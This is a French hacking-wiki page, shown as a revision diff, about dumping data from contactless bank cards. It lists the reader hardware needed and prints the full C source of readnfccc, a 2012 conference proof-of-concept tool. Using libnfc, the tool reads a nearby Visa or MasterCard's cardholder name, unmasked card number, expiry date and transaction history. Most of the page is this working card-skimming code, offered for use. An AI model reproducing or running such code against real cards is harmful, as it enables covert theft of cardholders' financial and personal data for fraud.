« Hacking:Dump Credit Card » : différence entre les versions

De HackBBS
Aller à la navigation Aller à la recherche
Page créée avec « '''Objectif:''' -Dumper les données que l'on peut trouver sur une carte banquaire. '''Materiel:''' Advanced Card Systems: Prix: 100€ environs Carte vierge: ... »
 
Aucun résumé des modifications
Ligne 18 : Ligne 18 :
Nous pouvons donc partir du fork de '''azet'''([https://github.com/azet/readnfccc]), mais il n'est pas non plus totalement compatible.
Nous pouvons donc partir du fork de '''azet'''([https://github.com/azet/readnfccc]), mais il n'est pas non plus totalement compatible.


 
La version finale de [readfncc ftp://hackbbs.org/Dev/C%20-%20C++/readnfccc/] est donc sur notre ftp. Elle fonctionne avec la dernière version de libnfc 1.7 et nous donne des résultats.
[[Fichier:/*
 
readnfccc - by Renaud Lifchitz (renaud.lifchitz@bt.com)
License: distributed under GPL version 3 (http://www.gnu.org/licenses/gpl.html)
 
* Introduction:
"Quick and dirty" proof-of-concept
Open source tool developped and showed for Hackito Ergo Sum 2012 - "Hacking the NFC credit cards for fun and debit ;)"
Reads NFC credit card personal data (gender, first name, last name, PAN, expiration date, transaction history...)
 
* Requirements:
libnfc (>= 1.6) and a suitable NFC reader (http://www.libnfc.org/documentation/hardware/compatibility)
 
* Compilation:
$ gcc readnfccc.c -lnfc -o readnfccc
 
* Known bugs and limitations:
- Supports only Visa & MasterCard "CB" credit cards (AID = A0 00 00 00 42 10 10)
- No support for currency and country in history (always shows € and doesn't display country)
- Needs code cleaning
 
*/
 
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
 
#include <nfc/nfc.h>
 
#define MAX_FRAME_LEN 300
 
static void show(int recvlg, uint8_t *recv)
{
  int i;
  printf("< [%02d] ", recvlg);
  for(i = 0; i < (int) recvlg; i++)
  {
    printf("%02x ", recv[i]);
  }
  printf("\n");
}
 
 
static void cardholder(int szRx, uint8_t *abtRx)
{
  /* Look for cardholder name */
  uint8_t *res = abtRx;
  int i;
  for(i = 0; i < szRx - 4; i++)
  {
    if((res[0] == 0x5f) && (res[1] == 0x20))
    {
      int size = res[2];
      char *start=(char*)&(res[3]);
      char *output = calloc(size+1, sizeof(char));
      strncpy(output, start, size);
      printf("Cardholder name: %s\n", output);
      free(output);
      break;
    }
    res++;
  }
}
 
 
static void pan(int szRx, uint8_t *abtRx, int masked)
{
  int i,j;
  /* Look for PAN */
  uint8_t *res = abtRx;  for( i = 0; i < szRx - 9; i++)
  {
    if((res[0] == 0x5a) && (res[1] == 0x08))
    {
      printf("PAN:");
 
      for( j = 0; j < 8; j++)
      {
        if(j % 2 == 0) printf(" ");
        uint8_t c = res[2+j];
        if(masked && (j >= 2) && (j <= 5))
        {
          printf("**");
        }
        else
        {
          printf("%02x", c);
        }
      }
      printf("\n");
      break;
    }
    res++;
  }
}
 
 
static void expiration(int szRx, uint8_t *abtRx)
{
  int i;
  /* Look for Expiry date */
  uint8_t *res = abtRx;
  for( i = 0; i < szRx - 6; i++)
  {
    if((res[0] == 0x5f) && (res[1] == 0x24) && (res[2]==0x03))
    {
      printf("Expiration date: 20%02x-%02x-%02x", res[3], res[4], res[5]);
      break;
    }
    ++ res;
  }
}
 
 
static void paylog(int szRx, uint8_t *abtRx)
{
  uint8_t *res = abtRx;
  char msg[100], amount[10];
  if(szRx == 18) // Non-empty transaction
  {
    //show(szRx, abtRx);
    res = abtRx;
 
    /* Look for date */
    sprintf(msg, "%02x/%02x/20%02x", res[14], res[13], res[12]);
 
    /* Look for transaction type */
    if(res[15] == 0)
    {
      sprintf(msg, "%s %s", msg, "Payment");
    }
    else if(res[15] == 1)
    {
      sprintf(msg, "%s %s", msg, "Withdrawal");
    }
 
    /* Look for amount*/
    sprintf(amount, "%02x%02x%02x", res[3], res[4], res[5]);
    sprintf(msg, "%s\t%d,%02x€", msg, atoi(amount), res[6]);
 
    printf("%s\n", msg);
  }
}
 
int main(int argc, char **argv)
{
  nfc_device* pnd;
 
  uint8_t abtRx[MAX_FRAME_LEN];
//  uint8_t abtTx[MAX_FRAME_LEN];
  int szRx = sizeof(abtRx);
//  size_t szTx;
 
  uint8_t START_14443A[] = {0x4A, 0x01, 0x00};
  uint8_t SELECT_APP[] = {0x40, 0x01, 0x00, 0xA4, 0x04, 0x00, 0x07, 0xA0, 0x00, 0x00, 0x00, 0x42, 0x10, 0x10, 0x00};
  uint8_t READ_RECORD_VISA[] = {0x40, 0x01, 0x00, 0xB2, 0x02, 0x0C, 0x00, 0x00};
  uint8_t READ_RECORD_MC[] = {0x40, 0x01, 0x00, 0xB2, 0x01, 0x14, 0x00, 0x00};
  uint8_t READ_PAYLOG_VISA[] = {0x40, 0x01, 0x00, 0xB2, 0x01, 0x8C, 0x00, 0x00};
  uint8_t READ_PAYLOG_MC[] = {0x40, 0x01, 0x00, 0xB2, 0x01, 0x5C, 0x00, 0x00};
 
  nfc_context *context;
  nfc_init(&context);
  if (context == NULL) {
    printf("Unable to init libnfc (malloc)");
    exit(EXIT_FAILURE);
  }
 
  pnd = nfc_open(context, NULL);
  if (pnd == NULL)
  {
    printf("Unable to connect to NFC device.\n");
    return(1);
  }
  printf("Connected to NFC reader: %s\n", nfc_device_get_name(pnd));
  // Initialise NFC device as "initiator"
  if (nfc_initiator_init(pnd) < 0) {
    nfc_perror(pnd, "nfc_initiator_init");
    nfc_close(pnd);
    nfc_exit(context);
    exit(EXIT_FAILURE);
  }
 
  while(1)
  {
 
    szRx = pn53x_transceive(pnd, START_14443A, sizeof(START_14443A), abtRx, sizeof(abtRx), NULL);
    if (szRx < 0)
    {
      nfc_perror(pnd, "START_14443A");
      return(1);
    }
    show(szRx, abtRx);
 
    szRx = pn53x_transceive(pnd, SELECT_APP, sizeof(SELECT_APP), abtRx, sizeof(abtRx), NULL);
    if (szRx < 0)
    {
      nfc_perror(pnd, "SELECT_APP");
      return(1);
    }
    show(szRx, abtRx);
 
    szRx = pn53x_transceive(pnd, READ_RECORD_VISA, sizeof(READ_RECORD_VISA), abtRx, sizeof(abtRx), NULL);
    if (szRx < 0)
    {
      nfc_perror(pnd, "READ_RECORD");
      return(1);
    }
    show(szRx, abtRx);
 
    cardholder(szRx, abtRx);
    pan(szRx, abtRx, 0);
    expiration(szRx, abtRx);
 
    szRx = pn53x_transceive(pnd, READ_RECORD_MC, sizeof(READ_RECORD_MC), abtRx, sizeof(abtRx), NULL);
    if (szRx < 0)
    {
      nfc_perror(pnd, "READ_RECORD");
      return(1);
    }
    show(szRx, abtRx);
 
    cardholder(szRx, abtRx);
    pan(szRx, abtRx, 0);
    expiration(szRx, abtRx);
    unsigned int i;
    for( i = 1; i <= 20; i++)
    {
      READ_PAYLOG_VISA[4] = i;
      szRx = pn53x_transceive(pnd, READ_PAYLOG_VISA, sizeof(READ_PAYLOG_VISA), abtRx, sizeof(abtRx), NULL);
      if (szRx < 0)
      {
        nfc_perror(pnd, "READ_RECORD");
        return(1);
      }
      paylog(szRx, abtRx);
    }
 
    for(i = 1; i <= 20; i++)
    {
      READ_PAYLOG_MC[4] = i;
      szRx = pn53x_transceive(pnd, READ_PAYLOG_MC, sizeof(READ_PAYLOG_MC), abtRx, sizeof(abtRx), NULL);
      if (szRx < 0)
      {
        nfc_perror(pnd, "READ_RECORD");
        return(1);
      }
      paylog(szRx, abtRx);
    }
 
    printf("-------------------------\n");
  }
 
  nfc_close(pnd);
 
  nfc_exit(context);
 
  return 0;
}
]]

Version du 4 juillet 2016 à 19:22

'''Objectif:''' -Dumper les données que l'on peut trouver sur une carte banquaire.

'''Materiel:''' Advanced Card Systems: Prix: 100€ environs

Carte vierge: Mifare Classic 1K. Fréquence: 13.56Mhz Prix: 10€

'''Programmes:''' readnfccc : Outil Open source du Hackito Ergo Sum 2012 - "Hacking the NFC credit cards for fun and debit ;)" Lit les informations présente sur les cartes NFC (genre, nom, prenom, PAN, date d'expiration, historique des transactions).

Les sources originales sont présentent sur [1], mais elle ont été codé pour la version 1.6 de libnfc. Nous pouvons donc partir du fork de azet([2]), mais il n'est pas non plus totalement compatible.

La version finale de [readfncc ftp://hackbbs.org/Dev/C%20-%20C++/readnfccc/] est donc sur notre ftp. Elle fonctionne avec la dernière version de libnfc 1.7 et nous donne des résultats.